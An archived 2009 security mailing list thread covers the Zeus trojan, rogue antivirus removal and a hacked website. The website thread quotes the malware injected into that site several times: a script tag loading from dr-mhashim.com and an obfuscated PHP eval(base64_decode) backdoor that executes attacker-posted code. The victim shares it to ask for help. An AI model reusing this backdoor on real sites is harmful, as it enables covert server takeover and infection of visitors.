Brian~

In Trusteer dot com's PDF, it goes into details.

The answer to your question is that the research so far shows this type of
malware to be "equally prevalent in Windows and Unix-based systems."

So they confirm it, but they don't break out the differential figures by
operating system types. At least, not to the public.

~Amy:)

--- In spyware@yahoogroups.com, b <ercoupeflyer@...> wrote:
>
> This is a very interesting problem,
>
>    Is there a break down between windows and mac OS(BSDunix) available for
this problem?
>
> Brian
>
> --- On Sun, 9/20/09, amy.licious <no_reply@yahoogroups.com> wrote:
>
> From: amy.licious <no_reply@yahoogroups.com>
> Subject: [spyware] Banking Trojan Evades AntiVirus Software
> To: spyware@yahoogroups.com
> Date: Sunday, September 20, 2009, 2:51 PM
>
>
>
>
>
>
>  
>
>
>
>
>
>                        This is this week's update into on-going research done
by security firm Trusteer dot com into electronic banking fraud. Trusteer's
primary business is in securing financial institutions' online interactions with
their clients and the broader online retail / consumer space. Take a look at the
site if this subject interests you. CTO Amit Klein spearheads Trusteer's
research efforts. Management, the Board and the Oversite Committee of Trusteer
has a pretty impressive pedigree (for a bunch of hackers, that is :P). ~A:)
>
>
>
> +++++
>
>
>
> Darknet.org. uk spilled these bits on Friday~
>
>
>
> Nasty Trojan Zeus Evades Antivirus Software
>
>
>
> This is one nasty piece of malware, seems like it’s working on a low
level as per rootkits, there aren’t many technical details but it may
well be operating on a Ring 0 level.
>
>
>
> The level of detection by AV software is quite scary, especially since the
malware is specifically targeting bank login details and it has the ability to
intercept the browser process.
>
>
>
> Definitely one to watch out for in your organization.
>
>
>
> One of the world’s nastiest password-stealing trojans evades detection
by the majority PCs running anti-virus programs, according to a study that
examined 10,000 machines.
>
>
>
> Zeus, a stealthy piece of malware that sits on a PC and waits for users to log
in to bank websites, is detected just 23 per cent of time by AV programs,
according to the study [PDF] released by security firm Trusteer. Even AV
programs with up-to-date malware signatures were unable to identify the
infection a majority of the time, the authors said.
>
>
>
> Zeus, which also goes by the name Zbot and PRG, escapes detection using
sophisticated techniques such as root-kit technology, the Trusteer report said.
The company is able to detect it by examining the fingerprint Zeus leaves when
it penetrates an infected PC’s browser process.
>
>
>
> It seems to be operating on a level that the AV engines can’t even
detect as when installed with the latest signatures they still can’t
alert a user they are infected.
>
>
>
> It’s time AV engines get a little more advanced and hook into important
processes like the browser and ensure they aren’t being tampered with or
monitored.
>
>
>
> Some kind of active memory protection must be possible.
>
>
>
> A recent report estimated that Zeus is the No. 1 trojan, with 3.6 million
infections in the US alone, or about 1 per cent of the installed base of PCs.
Trusteer’s study, which found Zeus accounted for 44 per cent of the
banking malware infections, was consistent with that finding. After sneaking
onto a PC, it sits quietly in the background until a user logs on to a financial
website. It then sends the login credentials to a remote server in real time,
sometimes by use of instant messaging programs.
>
>
>
> Of Zeus-infected machines, about 31 per cent don’t run AV at all and 14
percent run AV that’s out of date. The remaining 55 per cent had AV
programs that were up to date.
>
>
>
> Sitting at number 1 trojan this is a serious issue, especially with the
stealthy mode in which it operates it looks like it’s going to be hard to
stop the infections.
>
>
>
> I hope someone comes up with a tool or method to detect and prevent these
infections.
>
>
>
> Source: The Register
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [Non-text portions of this message have been removed]
>

Well it finally happened after all these years I was hacked by a windows box on
my own network,

Heres what happened

someone here hit a web site that used Java script to try to do a brute force
attack against several universities, my isp received email from them, and shut
down my INTERNET access. I found the offending machine on my network and turned
it off, it also tried to hack my mail server, making cyrus run at 100%. Anti
virus did not even detect it at all, noticed my network getting slow and and
started checking, and the same time, i had pnp enabled on my router, the virus
proped open a port using that, that stayed open until i turned off PNP. they
used the access to also use zombie machines from all over the world to try and
brute force login to my ssh server as root. this also caused network problems.
It even managed to open multiple attack all at one time against the cal polly
site!!

darn I have of course moved my ssh service to another random port, removed the
tell and blocked outgoing request to servers on port 22! closed the imap port
and enabled only local access to it, or through squirrel mail on the web... Umm
any one else seen this yet?

Oh and made sure the link scanner was turned on on the windows machine..... I
really hate microsoft./... jezzz turns out though that the link scanner was
active when checked and did not flag the website...


Brian

--- On Thu, 10/1/09, spyware@yahoogroups.com <spyware@yahoogroups.com> wrote:

From: spyware@yahoogroups.com <spyware@yahoogroups.com>
Subject: [spyware] File - Monthly Message to Mailing List Members
To: spyware@yahoogroups.com
Date: Thursday, October 1, 2009, 4:13 AM






�







To all Spyware Mailing List members -



This is a monthly informational message to all members that provides basic
information about the mailing list.



Purpose of this Mailing List

------------ --------- -------

This group is a PC and Internet Security Mailing list dedicated to providing
news and updated tools against spyware, adware, malware, virus, trojans, worms,
spam and other computer pests... by both removing and preventing them, on any
platform ( Windows, MacOS, Linux, etc. ). We welcome new members! This group is
moderated.



Posting Messages

------------ ----

Any member can post a message to the list by sending email to
spyware@yahoogroups .com. The following rules apply to posted messages:



a) BE KIND - Harassing other members, web team, moderators, the administration,
being rude, posting multiple messages with nonsense, running promotional ads
and/or spamming will just get you banned. No name calling, no vulgar language,
no promotion or links to offtopic sites.



b) NO SPAMMING! NO OFFTOPIC! NO WAREZ! NO TROLLING! - Do not use this mailing
list to promote pyramid schemes and other commercial sites. This includes
position openings by headhunters and recruiters. Also no discussion of illegal
activities such as software piracy and other intellectual property violations
will be allowed at all.



c) THINK BEFORE YOU POST - Unlike other mailing lists we do not entertain random
blobs of scribbles and nonsense, be constructive in what you have to say. Do not
post the same message on multiple threads, this is a form of spamming. Do not
hold at ransom other members that don't share your opinion.



d) NO NEGATIVITY, RACIAL OR POLITICAL STANCES - We believe that everyone is
entitled to their own point of view, but this does not mean that you have to
become negative, rude, distasteful, etc. Adding to this mailing list your
Anti-Microsoft, Anti-Apple, or Anti-Linux sentiment is NOT TOLERATED in the
LEAST! We are not saying you have to believe in what anyone says, but you do
need to respect their view(s). It is okay to be disagreeable so long as it is
done in a polite way.



e) BE ACTIVE - What is the point of joining a community to say nothing? Please
reply and contribute to the conversations. :)



f) EMAILS FROM US - We may send you newsletters about updates to this mailing
list. If you don't wish to receive emails from us, please edit your membership
by choosing how do you want messages do be delivered. There are 4 options:
'Individual emails' (sends individual email messages), 'Daily digest' (sends
many emails in one message), 'Special notices' (only sends important update
emails from the group moderators) and 'No email' (will not send emails, you'll
need to read the messages at the Web site).



g) NO PATCH, NO FLAWS - We moderators believe any security flaws should only be
posted when a solution/patch as been already released.



h) NO ATTACHMENTS - Attachments to messages are automatically removed.



Replying to Messages

------------ --------

The mailing list has been set up so that replies to messages are sent to the
entire list. If you wish to reply only to the poster, be sure that you send only
private mail to that person.



Before sending a reply to everyone in the mailing list, ask yourself, "is my
response of interest only to the person to whom I am replying, or is my response
of general interest?"



Changing Email Options

------------ --------- -

The following options are available:



* Individual E-mails. Every posting will arrive in your inbox as a separate
message.

* Daily digest. You will receive one e-mail message per day with all of the
day's postings.

* Special Notices. You will receive only administrative messages sent from the
mailing list owner.

* No Email. Select this option if you need to temporarily stop receiving email
messages. You can still view messages by going to the group's website at
http://groups. yahoo.com/ group/spyware



To edit your e-mail options, go to http://groups. yahoo.com/ group/spyware ,
join and select the desired option in the Message Delivery section. Then, press
Save Changes button.



Joining the Mailing List

------------ --------- ---



Any person can become a member by performing any of the following:



A. joining directly at http://groups. yahoo.com/ group/spyware

B. sending e-mail to spyware-subscribe@ yahoogroups. com

C. accepting an invitation e-mail



An invitation e-mail can be sent by any current member of the mailing list. The
invitation is sent by clicking the "invite" link found on home page (
http://groups. yahoo.com/ group/spyware ).



All memberships are approved automatically. A copy of the mailing list rules is
sent to each new member.



Leaving the Mailing List

------------ --------- ---

Any member may remove him/herself from the mailing list by sending e-mail to
spyware-unsubscribe @yahoogroups. com



Contacts

--------

Any mailing list member may send e-mail directly to the mailing list owner by
sending to spyware-owner@ yahoogroups. com



Thank you for your time.



- the admin





























[Non-text portions of this message have been removed]

That was the mother of all updates. Apparently today'ssecurity patchwas the
biggestever released byMicrosoft.

It's interesting that they still include their malicious software removal tool,
especially now that their new "Security Essentials" freeware suite is available.
I wonder what functions the malware tool performs that the new program doesn't?

Regards,

Steven Plisk


[Non-text portions of this message have been removed]

Hello everyone. I think that this group may be an answer to my prayers. I have
this thing called "Alpha Antivirus" and it makes me want to hurt people.....
lol. It keeps giving me pop ups, and my only option is to buy. Well I don't want
to buy it, and im not going to. I spent six hundred bucks on this laptop which
ran great, and this thing cut its speed in half. The thing is that I cant delete
it at all, so I went online and looked it up, only to find out that its some
kind of spy wear. The site that I went to offered what they called the the cure
all, however, the thing would never download because the file was corrupt or
something. I joined this group that I may learn how to get rid of this thing and
prevent future cases. I would be VERY greatfull to anyone who might tell me how
to rid my system of this nonsense, and what I need to do to keep it fast like it
was. I thank you all so very much.

By the way...
Inspiron 1501 laptop
running Vista Home Basic

Your friend Queastellyeah,

reinstall os, then we can make a list of what u need


[Non-text portions of this message have been removed]

Hello there,
     I have a website called eBlueFox.com. Since 3 weeks some body hacking
my website
and adding some kind of virus. My website files are in php and html
code.
They are adding following code in php and html files.

1)If its html file then adding the following code before <body> tag
<script src=http://dr-mhashim.com/ContactUs/myalbum.php ></script>.

2) If its php file then adding the following code before the first line
of code.

<?php
eval(base64_decode('aWYoIWlzc2V0KCRqemk5ODEpKXtmdW5jdGlvbiBqemk5OCgkcyl7\
aWYocHJlZ19tYXRjaF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjcmlwdD4jaXMnLCRzLCRhKSlm\
b3JlYWNoKCRhWzBdIGFzICR2KWlmKGNvdW50KGV4cGxvZGUoIlxuIiwkdikpPjUpeyRlPXBy\
ZWdfbWF0Y2goJyNbXCciXVteXHNcJyJcLiw7XD8hXFtcXTovPD5cKFwpXXszMCx9IycsJHYp\
fHxwcmVnX21hdGNoKCcjW1woXFtdKFxzKlxkKywpezIwLH0jJywkdik7aWYoKHByZWdfbWF0\
Y2goJyNcYmV2YWxcYiMnLCR2KSYmKCRlfHxzdHJwb3MoJHYsJ2Zyb21DaGFyQ29kZScpKSl8\
fCgkZSYmc3RycG9zKCR2LCdkb2N1bWVudC53cml0ZScpKSkkcz1zdHJfcmVwbGFjZSgkdiwn\
Jywkcyk7fWlmKHByZWdfbWF0Y2hfYWxsKCcjPGlmcmFtZSAoW14+XSo/KXNyYz1bXCciXT8o\
aHR0cDopPy8vKFtePl0qPyk+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXSBhcyAkdilpZihw\
cmVnX21hdGNoKCcjIHdpZHRoXHMqPVxzKltcJyJdPzAqWzAxXVtcJyI+IF18ZGlzcGxheVxz\
Kjpccypub25lI2knLCR2KSYmIXN0cnN0cigkdiwnPycuJz4nKSkkcz1wcmVnX3JlcGxhY2Uo\
JyMnLnByZWdfcXVvdGUoJHYsJyMnKS4nLio/PC9pZnJhbWU+I2lzJywnJywkcyk7JHM9c3Ry\
X3JlcGxhY2UoJGE9YmFzZTY0X2RlY29kZSgnUEhOamNtbHdkQ0J6Y21NOWFIUjBjRG92TDJS\
eUxXMW9ZWE5vYVcwdVkyOXRMME52Ym5SaFkzUlZjeTl0ZVdGc1luVnRMbkJvY0NBK1BDOXpZ\
M0pwY0hRKycpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGFj\
ZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMpO2Vsc2VpZihzdHJwb3MoJHMsJyxhJykp\
JHMuPSRhO3JldHVybiAkczt9ZnVuY3Rpb24ganppOTgyKCRhLCRiLCRjLCRkKXtnbG9iYWwg\
JGp6aTk4MTskcz1hcnJheSgpO2lmKGZ1bmN0aW9uX2V4aXN0cygkanppOTgxKSljYWxsX3Vz\
ZXJfZnVuYygkanppOTgxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEp\
IGFzICR2KWlmKCgkYT0kdlsnbmFtZSddKT09J2p6aTk4JylyZXR1cm47ZWxzZWlmKCRhPT0n\
b2JfZ3poYW5kbGVyJylicmVhaztlbHNlICRzW109YXJyYXkoJGE9PSdkZWZhdWx0IG91dHB1\
dCBoYW5kbGVyJz9mYWxzZTokYSk7Zm9yKCRpPWNvdW50KCRzKS0xOyRpPj0wOyRpLS0peyRz\
WyRpXVsxXT1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTt9b2Jfc3RhcnQoJ2p6\
aTk4Jyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7\
ZWNobyAkc1skaV1bMV07fX19JGp6aTk4bD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcignanpp\
OTgyJykpIT0nanppOTgyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10p\
KTs=')); ?>

3) Before they were adding "<iframe" some etc... code before the body
and end of the file. But they changed the stretagy. I'm
keep on cleaning and So far I did 5 times.
4) I've talked to the hosting company (godaddy.com) support group. They
said their servers are very
secured and there is some thing I need to control. I don't understand
what should I do. Its driving me crazy.
5) Some body suggested me to change the file permission to read only. I
did that one too. But no luck, next day
he is changing the file permission to "read,write, and execte" and added
spam.
   Please..please.. helm me to stop the spam.

   Thank you and I would appreciate for your help.

   Reg
   Bunny.





[Non-text portions of this message have been removed]

Try the easy method first by using the "Restore" function in Vista OS to
restore Vista back to a restore point some day before you got this "Alpha
Antivirus" into your PC to see if Restore eliminates the problem. If not,
then consider other more drastic method.



Sing Lin



From: spyware@yahoogroups.com [mailto:spyware@yahoogroups.com] On Behalf Of
queastellyeah
Sent: Monday, October 19, 2009 11:45 PM
To: spyware@yahoogroups.com
Subject: [spyware] PLEASE Help me!!!!!!!





Hello everyone. I think that this group may be an answer to my prayers. I
have this thing called "Alpha Antivirus" and it makes me want to hurt
people..... lol. It keeps giving me pop ups, and my only option is to buy.
Well I don't want to buy it, and im not going to. I spent six hundred bucks
on this laptop which ran great, and this thing cut its speed in half. The
thing is that I cant delete it at all, so I went online and looked it up,
only to find out that its some kind of spy wear. The site that I went to
offered what they called the the cure all, however, the thing would never
download because the file was corrupt or something. I joined this group that
I may learn how to get rid of this thing and prevent future cases. I would
be VERY greatfull to anyone who might tell me how to rid my system of this
nonsense, and what I need to do to keep it fast like it was. I thank you all
so very much.

By the way...
Inspiron 1501 laptop
running Vista Home Basic

Your friend Queastellyeah,





[Non-text portions of this message have been removed]

Load Linux onto your pc and be forever free!

OK so I exaggerate ,

Have you tried slipping the disk out and using another pc, and a good antivirus
to scan it(AVG works very well), it makes the process a whole lot easier!!

You can also download
onto a usb drive
boot it on your laptop and run clamav to scan after updating from calm site.

Cheers



--- In spyware@yahoogroups.com, "queastellyeah" <queastellyeah@...> wrote:
>
> Hello everyone. I think that this group may be an answer to my prayers. I have
this thing called "Alpha Antivirus" and it makes me want to hurt people.....
lol. It keeps giving me pop ups, and my only option is to buy. Well I don't want
to buy it, and im not going to. I spent six hundred bucks on this laptop which
ran great, and this thing cut its speed in half. The thing is that I cant delete
it at all, so I went online and looked it up, only to find out that its some
kind of spy wear. The site that I went to offered what they called the the cure
all, however, the thing would never download because the file was corrupt or
something. I joined this group that I may learn how to get rid of this thing and
prevent future cases. I would be VERY greatfull to anyone who might tell me how
to rid my system of this nonsense, and what I need to do to keep it fast like it
was. I thank you all so very much.
>
> By the way...
> Inspiron 1501 laptop
> running Vista Home Basic
>
> Your friend Queastellyeah,
>

1) ensure you have a good antivirus on your personal local computer
, and that there is no spy running on your computer before you access you web
page, be sure to always use https or secure password when accessing the site.

2) change all your passwords at once for your web site. ensure you do in fact
have a password for your website admin.
godaddy is very secure in preventing access to os etc, but not badly managed
pages.

3) make sure you have added the security file .htaccess to all of your
directories on your website which prevents access/writing. Make sure php is not
in debug mode..

4) make all files read only or rx

5) check the log files to see who is hacking or attempting to hack your site and
notify the service provider of the ip, ask to shut it down,(this probably will
fall on deaf ears, but at least you let someone know!

--- In spyware@yahoogroups.com, biksham <no_reply@...> wrote:
>
> Hello there,
>     I have a website called eBlueFox.com. Since 3 weeks some body hacking
> my website
> and adding some kind of virus. My website files are in php and html
> code.
> They are adding following code in php and html files.
>
> 1)If its html file then adding the following code before <body> tag
> <script src=http://dr-mhashim.com/ContactUs/myalbum.php ></script>.
>
> 2) If its php file then adding the following code before the first line
> of code.
>
> <?php
> eval(base64_decode('aWYoIWlzc2V0KCRqemk5ODEpKXtmdW5jdGlvbiBqemk5OCgkcyl7\
> aWYocHJlZ19tYXRjaF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjcmlwdD4jaXMnLCRzLCRhKSlm\
> b3JlYWNoKCRhWzBdIGFzICR2KWlmKGNvdW50KGV4cGxvZGUoIlxuIiwkdikpPjUpeyRlPXBy\
> ZWdfbWF0Y2goJyNbXCciXVteXHNcJyJcLiw7XD8hXFtcXTovPD5cKFwpXXszMCx9IycsJHYp\
> fHxwcmVnX21hdGNoKCcjW1woXFtdKFxzKlxkKywpezIwLH0jJywkdik7aWYoKHByZWdfbWF0\
> Y2goJyNcYmV2YWxcYiMnLCR2KSYmKCRlfHxzdHJwb3MoJHYsJ2Zyb21DaGFyQ29kZScpKSl8\
> fCgkZSYmc3RycG9zKCR2LCdkb2N1bWVudC53cml0ZScpKSkkcz1zdHJfcmVwbGFjZSgkdiwn\
> Jywkcyk7fWlmKHByZWdfbWF0Y2hfYWxsKCcjPGlmcmFtZSAoW14+XSo/KXNyYz1bXCciXT8o\
> aHR0cDopPy8vKFtePl0qPyk+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXSBhcyAkdilpZihw\
> cmVnX21hdGNoKCcjIHdpZHRoXHMqPVxzKltcJyJdPzAqWzAxXVtcJyI+IF18ZGlzcGxheVxz\
> Kjpccypub25lI2knLCR2KSYmIXN0cnN0cigkdiwnPycuJz4nKSkkcz1wcmVnX3JlcGxhY2Uo\
> JyMnLnByZWdfcXVvdGUoJHYsJyMnKS4nLio/PC9pZnJhbWU+I2lzJywnJywkcyk7JHM9c3Ry\
> X3JlcGxhY2UoJGE9YmFzZTY0X2RlY29kZSgnUEhOamNtbHdkQ0J6Y21NOWFIUjBjRG92TDJS\
> eUxXMW9ZWE5vYVcwdVkyOXRMME52Ym5SaFkzUlZjeTl0ZVdGc1luVnRMbkJvY0NBK1BDOXpZ\
> M0pwY0hRKycpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGFj\
> ZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMpO2Vsc2VpZihzdHJwb3MoJHMsJyxhJykp\
> JHMuPSRhO3JldHVybiAkczt9ZnVuY3Rpb24ganppOTgyKCRhLCRiLCRjLCRkKXtnbG9iYWwg\
> JGp6aTk4MTskcz1hcnJheSgpO2lmKGZ1bmN0aW9uX2V4aXN0cygkanppOTgxKSljYWxsX3Vz\
> ZXJfZnVuYygkanppOTgxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEp\
> IGFzICR2KWlmKCgkYT0kdlsnbmFtZSddKT09J2p6aTk4JylyZXR1cm47ZWxzZWlmKCRhPT0n\
> b2JfZ3poYW5kbGVyJylicmVhaztlbHNlICRzW109YXJyYXkoJGE9PSdkZWZhdWx0IG91dHB1\
> dCBoYW5kbGVyJz9mYWxzZTokYSk7Zm9yKCRpPWNvdW50KCRzKS0xOyRpPj0wOyRpLS0peyRz\
> WyRpXVsxXT1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTt9b2Jfc3RhcnQoJ2p6\
> aTk4Jyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7\
> ZWNobyAkc1skaV1bMV07fX19JGp6aTk4bD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcignanpp\
> OTgyJykpIT0nanppOTgyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10p\
> KTs=')); ?>
>
> 3) Before they were adding "<iframe" some etc... code before the body
> and end of the file. But they changed the stretagy. I'm
> keep on cleaning and So far I did 5 times.
> 4) I've talked to the hosting company (godaddy.com) support group. They
> said their servers are very
> secured and there is some thing I need to control. I don't understand
> what should I do. Its driving me crazy.
> 5) Some body suggested me to change the file permission to read only. I
> did that one too. But no luck, next day
> he is changing the file permission to "read,write, and execte" and added
> spam.
>   Please..please.. helm me to stop the spam.
>
>   Thank you and I would appreciate for your help.
>
>   Reg
>   Bunny.
>
>
>
>
>
> [Non-text portions of this message have been removed]
>

Hi there,
       First I would like to thank you for your reply.
1) I've AVG software on my pc which I've purchased recently after I got
attacked.
2) I changed the passwords for all of my ftp accounts.
3) How would I check whether my php is running debug mode or not? I did
not have .htaccess in all the directories.
Could you please let me know how to setup the .htaccess file.
4) I did change all the file permission to "read" only but he changing
write.
5) How to figure out who is hacking my site in log file. I've checked my
log file but I don't see that. Could you please give me more information
about the log file.

Note: I changed my all ftp passwords and not accessing ftp accounts from
home computers, since then they did not attack.
Let see whether they are going to come back or not.

Thanks again.
Bunny.

--- In spyware@yahoogroups.com, "ercoupeflyer" <ercoupeflyer@...> wrote:
>
>
> 1) ensure you have a good antivirus on your personal local computer
> , and that there is no spy running on your computer before you access
you web page, be sure to always use https or secure password when
accessing the site.
>
> 2) change all your passwords at once for your web site. ensure you do
in fact have a password for your website admin.
> godaddy is very secure in preventing access to os etc, but not badly
managed pages.
>
> 3) make sure you have added the security file .htaccess to all of your
directories on your website which prevents access/writing. Make sure php
is not in debug mode..
>
> 4) make all files read only or rx
>
> 5) check the log files to see who is hacking or attempting to hack
your site and notify the service provider of the ip, ask to shut it
down,(this probably will fall on deaf ears, but at least you let someone
know!
>
> --- In spyware@yahoogroups.com, biksham no_reply@ wrote:
> >
> > Hello there,
> >     I have a website called eBlueFox.com. Since 3 weeks some body
hacking
> > my website
> > and adding some kind of virus. My website files are in php and html
> > code.
> > They are adding following code in php and html files.
> >
> > 1)If its html file then adding the following code before <body> tag
> > <script src=http://dr-mhashim.com/ContactUs/myalbum.php ></script>.
> >
> > 2) If its php file then adding the following code before the first
line
> > of code.
> >
> > <?php
> >
eval(base64_decode('aWYoIWlzc2V0KCRqemk5ODEpKXtmdW5jdGlvbiBqemk5OCgkcyl7\
\
> >
aWYocHJlZ19tYXRjaF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjcmlwdD4jaXMnLCRzLCRhKSlm\
\
> >
b3JlYWNoKCRhWzBdIGFzICR2KWlmKGNvdW50KGV4cGxvZGUoIlxuIiwkdikpPjUpeyRlPXBy\
\
> >
ZWdfbWF0Y2goJyNbXCciXVteXHNcJyJcLiw7XD8hXFtcXTovPD5cKFwpXXszMCx9IycsJHYp\
\
> >
fHxwcmVnX21hdGNoKCcjW1woXFtdKFxzKlxkKywpezIwLH0jJywkdik7aWYoKHByZWdfbWF0\
\
> >
Y2goJyNcYmV2YWxcYiMnLCR2KSYmKCRlfHxzdHJwb3MoJHYsJ2Zyb21DaGFyQ29kZScpKSl8\
\
> >
fCgkZSYmc3RycG9zKCR2LCdkb2N1bWVudC53cml0ZScpKSkkcz1zdHJfcmVwbGFjZSgkdiwn\
\
> >
Jywkcyk7fWlmKHByZWdfbWF0Y2hfYWxsKCcjPGlmcmFtZSAoW14+XSo/KXNyYz1bXCciXT8o\
\
> >
aHR0cDopPy8vKFtePl0qPyk+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXSBhcyAkdilpZihw\
\
> >
cmVnX21hdGNoKCcjIHdpZHRoXHMqPVxzKltcJyJdPzAqWzAxXVtcJyI+IF18ZGlzcGxheVxz\
\
> >
Kjpccypub25lI2knLCR2KSYmIXN0cnN0cigkdiwnPycuJz4nKSkkcz1wcmVnX3JlcGxhY2Uo\
\
> >
JyMnLnByZWdfcXVvdGUoJHYsJyMnKS4nLio/PC9pZnJhbWU+I2lzJywnJywkcyk7JHM9c3Ry\
\
> >
X3JlcGxhY2UoJGE9YmFzZTY0X2RlY29kZSgnUEhOamNtbHdkQ0J6Y21NOWFIUjBjRG92TDJS\
\
> >
eUxXMW9ZWE5vYVcwdVkyOXRMME52Ym5SaFkzUlZjeTl0ZVdGc1luVnRMbkJvY0NBK1BDOXpZ\
\
> >
M0pwY0hRKycpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGFj\
\
> >
ZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMpO2Vsc2VpZihzdHJwb3MoJHMsJyxhJykp\
\
> >
JHMuPSRhO3JldHVybiAkczt9ZnVuY3Rpb24ganppOTgyKCRhLCRiLCRjLCRkKXtnbG9iYWwg\
\
> >
JGp6aTk4MTskcz1hcnJheSgpO2lmKGZ1bmN0aW9uX2V4aXN0cygkanppOTgxKSljYWxsX3Vz\
\
> >
ZXJfZnVuYygkanppOTgxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEp\
\
> >
IGFzICR2KWlmKCgkYT0kdlsnbmFtZSddKT09J2p6aTk4JylyZXR1cm47ZWxzZWlmKCRhPT0n\
\
> >
b2JfZ3poYW5kbGVyJylicmVhaztlbHNlICRzW109YXJyYXkoJGE9PSdkZWZhdWx0IG91dHB1\
\
> >
dCBoYW5kbGVyJz9mYWxzZTokYSk7Zm9yKCRpPWNvdW50KCRzKS0xOyRpPj0wOyRpLS0peyRz\
\
> >
WyRpXVsxXT1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTt9b2Jfc3RhcnQoJ2p6\
\
> >
aTk4Jyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7\
\
> >
ZWNobyAkc1skaV1bMV07fX19JGp6aTk4bD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcignanpp\
\
> >
OTgyJykpIT0nanppOTgyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10p\
\
> > KTs=')); ?>
> >
> > 3) Before they were adding "<iframe" some etc... code before the
body
> > and end of the file. But they changed the stretagy. I'm
> > keep on cleaning and So far I did 5 times.
> > 4) I've talked to the hosting company (godaddy.com) support group.
They
> > said their servers are very
> > secured and there is some thing I need to control. I don't
understand
> > what should I do. Its driving me crazy.
> > 5) Some body suggested me to change the file permission to read
only. I
> > did that one too. But no luck, next day
> > he is changing the file permission to "read,write, and execte" and
added
> > spam.
> >   Please..please.. helm me to stop the spam.
> >
> >   Thank you and I would appreciate for your help.
> >
> >   Reg
> >   Bunny.
> >
> >
> >
> >
> >
> > [Non-text portions of this message have been removed]
> >
>

I just googled for "dr-mhashim.com"
and most of the websites that list that
text are Arabic but this website below
lists it as a known virus site.

http://hosts-file.net/?s=Download&f=Partial

"IMPORTANT: Many of the sites listed in this
database WILL INFECT your computer. DO NOT
visit them if you do not know what you are
doing."

Unquote

But your website is not listed for some reason.

WRZ



--- In spyware@yahoogroups.com, biksham <no_reply@...> wrote:
>
> Hello there,
>     I have a website called eBlueFox.com. Since 3 weeks some body hacking
> my website
> and adding some kind of virus. My website files are in php and html
> code.
> They are adding following code in php and html files.
>
> 1)If its html file then adding the following code before <body> tag
> <script src=http://dr-mhashim.com/ContactUs/myalbum.php ></script>.
>
> 2) If its php file then adding the following code before the first line
> of code.

<snip>

Six years ago (26th of October 2003) the Spyware Group was launched on this
Yahoo style mailing list and it has been an exciting and educational experience
for us all. During this time we've seen a great deal of activity here, including
the very rapid approach of the joining of our two-thousandth member (That is
likely to be just a few weeks away now).

The Moderating Team would like to thank all of you for participating in this
mailing list and for helping us to reach this new milestone. Whether you are a
recent member or a long time participant, we want you all to know that we've
enjoyed serving your computing security needs and we hope to continue doing so
well into the future!

Thank you again for your participation!

The Mods

LOL Yes indeed, Steven! It was a great "sending off party" for Windows 7 ~ that
would be "Vista Mach II for Business" that businesses are now essentially
"forced" to buy and thus make it acceptable to consumers as well. (but the
expensive versions called 7 Professional, 7 Business, 7 Ultimate and 7
Enterprise come, strangely enough, equipped with the XP downgrade! :p).

It truly was mammoth, however, many of the Critical and Important updates did
not really apply to the Windows operating system. They applied to a browser
which few people use anymore, an Office Set of programs that also aren't very
popular anymore, a developer's base known as NET Framework which unfortunately
developers are kind of forced to deal with and the NET component that'll compete
with Adobe Creative Essentials called Silverlight.

The one program that connects all of these others together has been around for
more than a decade, the famous ActiveX component of IE. Do we really need
ActiveX? Not in the slightest.

So why does it stick around? I don't really know. People always ask why doesn't
Microsoft kill ActiveX in a browser update? Well, maybe, Redmond's trying slowly
but surely with the mammoth updates but it's gonna be hard with ActiveX coded
back light years in Windows.

~Amy:)

--- In spyware@yahoogroups.com, Steven Plisk <steve@...> wrote:
>
> That was the mother of all updates. Apparently today'ssecurity patchwas the
biggestever released byMicrosoft.
>
> It's interesting that they still include their malicious software removal
tool, especially now that their new "Security Essentials" freeware suite is
available. I wonder what functions the malware tool performs that the new
program doesn't?
>
> Regards,
>
> Steven Plisk
>
>
> [Non-text portions of this message have been removed]
>

.htaccess is documented on the apache web site documentation, It will give you
all the information you need.

php is in debug mode when a flag is set in the php config file, if you dont have
access to it, you dont have to worry, but check your directories for something
like php5.conf etc..

make sure debug level logging is turned on for you web server then review the
access log, looking for ip address at the time of the change, then you do a
lookup to see where it is comming from, you can do two things, direct that
address in your website using .htaccess to the FBI/NSA/DARPA� web site, or some
tracking website... it's fun to get even and may scare him to stop.

I suspect from your comment that your home computer was hacked or you accessed
your web site admin from a public computer and they got your password from that!

Sorry to take to long getting back to you

Brian

--- On Sat, 10/24/09, biksham <no_reply@yahoogroups.com> wrote:

From: biksham <no_reply@yahoogroups.com>
Subject: [spyware] Re: My website is hacked by some body, please help me.
